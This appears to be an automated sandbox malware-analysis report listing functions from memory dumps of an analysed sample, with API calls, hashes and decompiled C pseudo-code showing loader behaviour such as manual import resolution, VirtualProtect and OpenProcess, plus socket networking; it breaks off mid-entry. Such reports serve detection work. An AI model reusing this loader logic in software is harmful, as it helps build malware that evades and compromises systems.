Part of subcall function 00AAB330: std::_Lockit::_Lockit.LIBCPMT ref: 00AAB370
Part of subcall function 00AAB330: std::_Lockit::_Lockit.LIBCPMT ref: 00AAB392
Part of subcall function 00AAB330: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAB3B2
Part of subcall function 00AAB330: std::_Lockit::~_Lockit.LIBCPMT ref: 00AAB482

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$InitSetgloballocaleYarn
String ID:
API String ID: 2825317204-0
Opcode ID: 9148a81bf4932310c0d4d115b89eeebb9c4e3b6590a775a4383b33540cd09f36
Instruction ID: cd51b294a30ad34fdb6627c3146b66c1cbc2aca1865a5c961c02ba5b599a9fab
Opcode Fuzzy Hash: 9148a81bf4932310c0d4d115b89eeebb9c4e3b6590a775a4383b33540cd09f36
Instruction Fuzzy Hash: 7B31ACB0A00605AFE700DF64C949B9ABBF4FF05714F104229E8198BBC1D7B6A968CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00C32BB5, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00C35F2B: RtlAllocateHeap.NTDLL(00000008,00C18D42,00000000), ref: 00C35F6C

_free.LIBCMT ref: 00C32BD5

Part of subcall function 00C35F88: HeapFree.KERNEL32(00000000,00000000,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?), ref: 00C35F9E
Part of subcall function 00C35F88: GetLastError.KERNEL32(?,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?,?), ref: 00C35FB0

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 178a6e2ef0ebd9e9a1186595ba2f36664c4b3db8b67ced1f245eb4727469003b
Instruction ID: 8bcfddc5e0e6ca08655516835fe3e88437af18f44b626932bf29d6de10b18e8f
Opcode Fuzzy Hash: 178a6e2ef0ebd9e9a1186595ba2f36664c4b3db8b67ced1f245eb4727469003b
Instruction Fuzzy Hash: 10011AB6D00619AFCB10DFA9C881ADEBBF8FB48710F104526EA15E7240E770AA45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D855CFE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6D8562A1,00000001,00000364,00000008,000000FF,?,6D8471A5,00000000,00000000,00000000,00000000,00000000), ref: 6D855D3F

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4603c1b89397e383b100245fb9251f7f36c726281ef6fa2dd2dae381ec726c67
Instruction ID: 2594df1d01a829075e2fea958588315264ff38a37585fdb6fb5b3579d47c8598
Opcode Fuzzy Hash: 4603c1b89397e383b100245fb9251f7f36c726281ef6fa2dd2dae381ec726c67
Instruction Fuzzy Hash: 0CF0BB33504365D6FFE15E298C0CB7B3759AF82670F118DB1B914DA194CB61D42186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C35F2B, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00C18D42,00000000), ref: 00C35F6C

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4805a7167a723f8262a8d84c55222b6f9bb17f7a09fe91333379276b215be53f
Instruction ID: b7c6ce861fae0a7709409d08218d8c3e2bce4185237fd3475d424a21e1918297
Opcode Fuzzy Hash: 4805a7167a723f8262a8d84c55222b6f9bb17f7a09fe91333379276b215be53f
Instruction Fuzzy Hash: 9FF0E931564E24AFDB215AE69C05B6B7B48AF597B0F184111AC24E71D0CA30ED0192E1

Uniqueness

Uniqueness Score: -1.00%

Function 00C37E1A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00C37E4C

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3ad6d337b10da455264c993aad41346d3986af4377b076f5bdc209828a9aed12
Instruction ID: 3129b227415016b15cb9e0e8dbf911e19bc1869ed89cab061e2a1bd1a932ec58
Opcode Fuzzy Hash: 3ad6d337b10da455264c993aad41346d3986af4377b076f5bdc209828a9aed12
Instruction Fuzzy Hash: 9AE02B721783299FE73126669C0475B7B48AF517B1F1403A0EC34E2190CF50DE00A1F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8DB70, Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 00A8DBA3

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 914e7766ca8c1e7333285d8b23cbd3b7ce55024a00ab26aaf9ed4fdb6ec7f9a1
Instruction ID: efafbbb2ea097fdb5b5765ee7db2366ff6478bbf7b91ada94883d8731a441bf1
Opcode Fuzzy Hash: 914e7766ca8c1e7333285d8b23cbd3b7ce55024a00ab26aaf9ed4fdb6ec7f9a1
Instruction Fuzzy Hash: EEE092306143048FD720FB3CDC26BA973D8EB4A310F400669D96DC72C0EE35581187A7

Uniqueness

Uniqueness Score: -1.00%

Function 6D8467E8, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D8467FB

Part of subcall function 6D855D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D71
Part of subcall function 6D855D5B: GetLastError.KERNEL32(00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D83

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 92f937141baf9322223fe1566c7731c72839e6b40fda96cfda013d5640f7fe83
Instruction ID: d3b96470a6101d442fb77b188012a73d76753c3f0189b4949655f0f34dd9c566
Opcode Fuzzy Hash: 92f937141baf9322223fe1566c7731c72839e6b40fda96cfda013d5640f7fe83
Instruction Fuzzy Hash: C9C08C32000208FBDB008F45C80AA4E7BA8DB80268F200098E40517250CBB1EE009680

Uniqueness

Uniqueness Score: -1.00%

Function 00A7136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00A7136F(void* __eax, intOrPtr _a4) {

				 *0xa73110 =  *0xa73110 & 0x00000000;
				_push(0);
				_push(0xa7310c);
				_push(1);
				_push(_a4);
				 *0xa73108 = 0xc; // executed
				L00A71746(); // executed
				return __eax;
			}

0x00a7136f
0x00a71376
0x00a71378
0x00a7137d
0x00a7137f
0x00a71383
0x00a7138d
0x00a71392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00A713F1,00000001,00A7310C,00000000), ref: 00A7138D

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: f074b44c9d1c7cd9257ba6e7818ab320c5c87b032c5a4b835780d5c1cd65e0b5
Instruction ID: e6aadae804b3c424d2d73a4cd28371b182da8c9a329c9cb88327164d8a69e56b
Opcode Fuzzy Hash: f074b44c9d1c7cd9257ba6e7818ab320c5c87b032c5a4b835780d5c1cd65e0b5
Instruction Fuzzy Hash: 09C04CB6284300B6EE10DB409C46F457B91B750705FA1CA04B658241D183F55295A915

Uniqueness

Uniqueness Score: -1.00%

Function 00A71D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A71D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0xa73100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa73100 - 0x69b24f45 &  !( *0xa73100 - 0x69b24f45);
				_t18 = E00A71000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa73100 - 0x69b24f45 &  !( *0xa73100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa73100 - 0x69b24f45 &  !( *0xa73100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00A710E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00A71264(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00A71BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00A717CB(_t42);
					L8:
					return _t29;
				}
			}

0x00a71d86
0x00a71d88
0x00a71da4
0x00a71db5
0x00a71dbc
0x00a71e1a
0x00000000
0x00a71dbe
0x00a71dbe
0x00a71dc8
0x00a71dcc
0x00a71dd1
0x00a71dd4
0x00a71dd9
0x00a71ddd
0x00a71de2
0x00a71de7
0x00a71deb
0x00a71df0
0x00a71df1
0x00a71df5
0x00a71dfa
0x00a71e02
0x00a71e02
0x00a71dfa
0x00a71deb
0x00a71ddd
0x00a71e04
0x00a71e0d
0x00a71e11
0x00a71e1b
0x00a71e21
0x00a71e21

APIs

Part of subcall function 00A71000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A71DBA,?,?,?,?,?,00000002,?,?), ref: 00A71024
Part of subcall function 00A71000: GetProcAddress.KERNEL32(00000000,?), ref: 00A71046
Part of subcall function 00A71000: GetProcAddress.KERNEL32(00000000,?), ref: 00A7105C
Part of subcall function 00A71000: GetProcAddress.KERNEL32(00000000,?), ref: 00A71072
Part of subcall function 00A71000: GetProcAddress.KERNEL32(00000000,?), ref: 00A71088
Part of subcall function 00A71000: GetProcAddress.KERNEL32(00000000,?), ref: 00A7109E

Part of subcall function 00A710E4: memcpy.NTDLL(00000002,?,00A71DC8,?,?,?,?,?,00A71DC8,?,?,?,?,?,?,?), ref: 00A7111B
Part of subcall function 00A710E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00A71150

Part of subcall function 00A71264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A7129C

Part of subcall function 00A71BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A71BE7
Part of subcall function 00A71BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A71C5C
Part of subcall function 00A71BAE: GetLastError.KERNEL32 ref: 00A71C62

GetLastError.KERNEL32(?,?), ref: 00A71DFC

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 0450e3792233c3a744f9c7b63029dc7d3fe0f4e8ab7342b499ac64a388cbbb1d
Instruction ID: cfccd9c878ccb82a204755c102f5bb67acc24cdf7779a28acc08aaebc6339090
Opcode Fuzzy Hash: 0450e3792233c3a744f9c7b63029dc7d3fe0f4e8ab7342b499ac64a388cbbb1d
Instruction Fuzzy Hash: 3E11CB76600701ABDB21EB9D8D80DEB77FCAF98314B04C559FE0997501EA60ED068790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AD5D70, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 468libraryloadertimeCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD5E91
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00AD5EA1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD5ECB
GetModuleHandleA.KERNEL32(00C6B6F4,00C6B6E0,?,?,000F4240,00000000), ref: 00AD5F1F
GetProcAddress.KERNEL32(00000000), ref: 00AD5F26
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD5FB9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD5FD9
WaitForMultipleObjectsEx.KERNEL32(00C5CA2D,00AACD0A,00000000,00000000,00000000,?,?,000F4240,00000000), ref: 00AD6017
CloseHandle.KERNEL32(00000000,?,?,000F4240,00000000), ref: 00AD6043
QueryPerformanceFrequency.KERNEL32(?,?,?,000F4240,00000000), ref: 00AD6093
QueryPerformanceCounter.KERNEL32(?,?,?,000F4240,00000000), ref: 00AD60C8
QueryPerformanceCounter.KERNEL32(?,?,?,000F4240,00000000), ref: 00AD60DC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD6147
CloseHandle.KERNEL32(00000000,?,?,000F4240,00000000), ref: 00AD619A
ResetEvent.KERNEL32(00000000,?,?,000F4240,00000000), ref: 00AD61B5
GetCurrentProcessId.KERNEL32(00000000,?,00D741E8,?,?,000F4240,00000000), ref: 00AD626C

Strings

e-flag, xrefs: 00AD61F9

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$HandlePerformanceQuery$CloseCounter$AddressCreateCurrentEventFrequencyModuleMultipleObjectsProcProcessResetTimerWaitWaitable
String ID: e-flag
API String ID: 4212561240-538632313
Opcode ID: fb2b724dd91828cd5e8fca43894fa26edfade9f8f55aa746138e6450d29ca404
Instruction ID: 4623be48d45d99e77f41426d2ac9a08d51c7f65a05e911f0cf09ff5d6db14805
Opcode Fuzzy Hash: fb2b724dd91828cd5e8fca43894fa26edfade9f8f55aa746138e6450d29ca404
Instruction Fuzzy Hash: 2302A071D006499BDB24DF78C841BAEB7B5EF59310F14872AE912EB391EB74A9818B10

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F6D0, Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 393networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 00A8F71C
setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 00A8F7B8
bind.WS2_32(00000000,?,00000010), ref: 00A8F800

Part of subcall function 00A8EDE0: WSAGetLastError.WS2_32 ref: 00A8EE40

getsockname.WS2_32(00000000,?,?), ref: 00A8F857
listen.WS2_32(00000000,7FFFFFFF), ref: 00A8F8BD
WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 00A8F8ED
connect.WS2_32(00000000,?,00000010), ref: 00A8F949
accept.WS2_32(00000000,00000000,00000000), ref: 00A8F997
ioctlsocket.WS2_32(00000010,8004667E,00000001), ref: 00A8FA41
setsockopt.WS2_32(00000010,00000006,00000001,00000001,00000004), ref: 00A8FA9C
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00A8FAE3
setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 00A8FB1D

Strings

socket_select_interrupter, xrefs: 00A8FB85, 00A8FB92, 00A8FB9F

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: setsockopt$Socketioctlsocket$ErrorLastacceptbindconnectgetsocknamelisten
String ID: socket_select_interrupter
API String ID: 4018613995-3103927870
Opcode ID: d4a23bcab7158d00fde955fa59bad24d5843f0a61f281b4db8b3539b83538215
Instruction ID: bfa39e324ed27ba272cce851ba8a125e1cdc9a2f1000ef7bad05b0218dd8997b
Opcode Fuzzy Hash: d4a23bcab7158d00fde955fa59bad24d5843f0a61f281b4db8b3539b83538215
Instruction Fuzzy Hash: 4FF18371D003099EDF20EBB8D895BEDBBB0AF19324F24431AE921772D1E7B55988CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A903A0, Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 392networksleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00A903E9
RtlLeaveCriticalSection.NTDLL(?), ref: 00A905EA
Sleep.KERNEL32(?,?), ref: 00A90653
select.WS2_32(00000002,?,?,?,00000000), ref: 00A9069F
__WSAFDIsSet.WS2_32(?,?), ref: 00A906C8
WSARecv.WS2_32(?,00000400,00000001,00000000,?,00000000,00000000), ref: 00A90722
WSAGetLastError.WS2_32 ref: 00A9072E
RtlLeaveCriticalSection.NTDLL(?), ref: 00A90993

Strings

M', xrefs: 00A90782
F', xrefs: 00A90758

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$Leave$EnterErrorLastRecvSleepselect
String ID: F'$M'
API String ID: 4028809722-4092438380
Opcode ID: 636e60d409760ac5f30679c01831ebffeea5f41af09891650805113614fa61d3
Instruction ID: 837b50c6bc246e0d2540ddb2f65749b5377ab4418417df8e51f428c4da45748a
Opcode Fuzzy Hash: 636e60d409760ac5f30679c01831ebffeea5f41af09891650805113614fa61d3
Instruction Fuzzy Hash: E3025EB1A002148FDF24DF24C884B9977F5EF45350F5441A9EE49EB252DB70AE84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A910D0, Relevance: 12.3, APIs: 8, Instructions: 301networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,C8000006,?,?,?,00000010,?,00000004,?), ref: 00A9117E
bind.WS2_32(?,?,0000001C), ref: 00A91214
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00A91273
RtlEnterCriticalSection.NTDLL(00000001), ref: 00A91285
RtlLeaveCriticalSection.NTDLL(00000001), ref: 00A912B2

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$CompletionEnterIoctlLeavePostQueuedStatusbind
String ID:
API String ID: 3078511837-0
Opcode ID: e4ceeb262cf0d473e6e56b353cdc47deb6491a9c7c6ab5c5712ed8a6ba1cb670
Instruction ID: 1a5b41b562be206bb2307060fb9b127c5c8a7158b8001397f11ac6257ea9f9c8
Opcode Fuzzy Hash: e4ceeb262cf0d473e6e56b353cdc47deb6491a9c7c6ab5c5712ed8a6ba1cb670
Instruction Fuzzy Hash: 86C18A716043469FCB14DF24C984A5BB7F4FF89314F108A1EF8899B690EB74E984CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C3E954, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(05555555,2000000B,00C3EC72,00000002,00000000,?,?,?,00C3EC72,?,00000000), ref: 00C3E9ED
GetLocaleInfoW.KERNEL32(05555555,20001004,00C3EC72,00000002,00000000,?,?,?,00C3EC72,?,00000000), ref: 00C3EA16
GetACP.KERNEL32(?,?,00C3EC72,?,00000000), ref: 00C3EA2B

Strings

ACP, xrefs: 00C3E972
OCP, xrefs: 00C3E9A8

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec7f129b47030a7f671d8bb642fe0e89398b10d99e01223d98a1e33d35580b14
Instruction ID: 8cf3f86c5908e9a378d21113e4d371eaed7f9c8b2eddb7b5589602bcb6b5a85b
Opcode Fuzzy Hash: ec7f129b47030a7f671d8bb642fe0e89398b10d99e01223d98a1e33d35580b14
Instruction Fuzzy Hash: 7721D032720200A6DB348F56C904BEBBBAAFF50B54F568424E81ADB290EB32DE40D350

Uniqueness

Uniqueness Score: -1.00%

Function 00C3E1C8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00C36300: GetLastError.KERNEL32(00000000,00000000,00000004,00C267A2,00000000,00000000,00000000,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C36305
Part of subcall function 00C36300: SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C363A3

GetACP.KERNEL32(?,?,?,?,?,?,00C331F5,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C3E289
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C331F5,?,?,?,00000055,?,-00000050,?,?), ref: 00C3E2B4
_wcschr.LIBVCRUNTIME ref: 00C3E348
_wcschr.LIBVCRUNTIME ref: 00C3E356
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C3E417

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: 0a54ee3cd8c8721074c8a19f6129a52976f82b87380df707206086264014b369
Instruction ID: ae6e3af1d0b09e3808d71cb6473538ab665421cd67da83b23a6d2d991b490c3c
Opcode Fuzzy Hash: 0a54ee3cd8c8721074c8a19f6129a52976f82b87380df707206086264014b369
Instruction Fuzzy Hash: 5E712871A60306ABDB25AB35CC42BAB77ACEF49700F144029F916E71D1EB71EE40E760

Uniqueness

Uniqueness Score: -1.00%

Function 00C3EB29, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00C36300: GetLastError.KERNEL32(00000000,00000000,00000004,00C267A2,00000000,00000000,00000000,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C36305
Part of subcall function 00C36300: SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C363A3

Part of subcall function 00C36300: _free.LIBCMT ref: 00C36362
Part of subcall function 00C36300: _free.LIBCMT ref: 00C36398

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C3EC35
IsValidCodePage.KERNEL32(00000000), ref: 00C3EC7E
IsValidLocale.KERNEL32(?,00000001), ref: 00C3EC8D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C3ECD5
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C3ECF4

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 62b4347fb183d36777b1e1027030cb7efcf3826f2e892bb29f7a550ace3cd832
Instruction ID: 74c261c982b1c1f109530824130c371186dfc6dfcb013fd810e68934032f3f87
Opcode Fuzzy Hash: 62b4347fb183d36777b1e1027030cb7efcf3826f2e892bb29f7a550ace3cd832
Instruction Fuzzy Hash: 04518071A2020AAFDF21DFA5DC41BAEB7B8BF09700F084469E915E71D0E7709E44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A71752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A71752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0xa730f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0xa730fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0xa730ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0xa730e8 = _t5;
						 *0xa730f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0xa730e4 = _t6;
						if(_t6 == 0) {
							 *0xa730e4 =  *0xa730e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00a71753
0x00a71761
0x00a71767
0x00a7176e
0x00a717c5
0x00a717c5
0x00a71770
0x00a71778
0x00a71785
0x00a71785
0x00a717c1
0x00a717c3
0x00000000
0x00000000
0x00000000
0x00a7177a
0x00a71781
0x00a71787
0x00a71787
0x00a7178c
0x00a7179a
0x00a7179f
0x00a717a5
0x00a717ab
0x00a717b2
0x00a717b4
0x00a717b4
0x00a717be
0x00a71783
0x00a71783
0x00000000
0x00a71783
0x00a71781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A719AC), ref: 00A71761
GetVersion.KERNEL32 ref: 00A71770
GetCurrentProcessId.KERNEL32 ref: 00A7178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A717A5

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: dfa321d5ff8e63daa389f7ed8dfe2e3223a03d981d3256afb300b4c0fbae2e6c
Instruction ID: b0fe6cddb31a0375b62bfc0dd2eadd1b5f6db961b1eb0562b585b81bb1796094
Opcode Fuzzy Hash: dfa321d5ff8e63daa389f7ed8dfe2e3223a03d981d3256afb300b4c0fbae2e6c
Instruction Fuzzy Hash: F1F031326802129BDB25EBA87C16B943BA5E704711F11C126E64EC61E0E77189C3DF64

Uniqueness

Uniqueness Score: -1.00%

Function 6D837D41, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6D837E61,6D9C6F68), ref: 6D837D46
UnhandledExceptionFilter.KERNEL32(6D837E61,?,6D837E61,6D9C6F68), ref: 6D837D4F
GetCurrentProcess.KERNEL32(C0000409,?,6D837E61,6D9C6F68), ref: 6D837D5A
TerminateProcess.KERNEL32(00000000,?,6D837E61,6D9C6F68), ref: 6D837D61

Memory Dump Source

